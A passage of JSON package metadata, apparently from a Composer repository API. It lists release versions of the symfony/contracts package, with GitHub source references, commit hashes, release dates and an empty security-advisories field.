contracts","symfony/cache-contracts-implementation":"","symfony/service-contracts-implementation":"","symfony/translation-contracts-implementation":""}},{"version":"v1.0.1","version_normalized":"1.0.1.0","source":{"url":"https://github.com/symfony/contracts.git","type":"git","reference":"3edf0ab943d1985a356721952cba36ff31bd6e5f"},"dist":{"url":"https://api.github.com/repos/symfony/contracts/zipball/3edf0ab943d1985a356721952cba36ff31bd6e5f","type":"zip","shasum":"","reference":"3edf0ab943d1985a356721952cba36ff31bd6e5f"},"time":"2018-11-24T09:35:08+00:00"},{"version":"v1.0.0","version_normalized":"1.0.0.0","source":{"url":"https://github.com/symfony/contracts.git","type":"git","reference":"4a33574d5771f4b04334cd4f7d43de96a92efb62"},"dist":{"url":"https://api.github.com/repos/symfony/contracts/zipball/4a33574d5771f4b04334cd4f7d43de96a92efb62","type":"zip","shasum":"","reference":"4a33574d5771f4b04334cd4f7d43de96a92efb62"},"time":"2018-10-31T08:00:32+00:00"},{"version":"v1.0.0-RC1","version_normalized":"1.0.0.0-RC1"},{"version":"v1.0.0-BETA1","version_normalized":"1.0.0.0-beta1"}]},"security-advisories":[],"last-modified":"Fri, 03 May 2024 06:26:38 GMT"}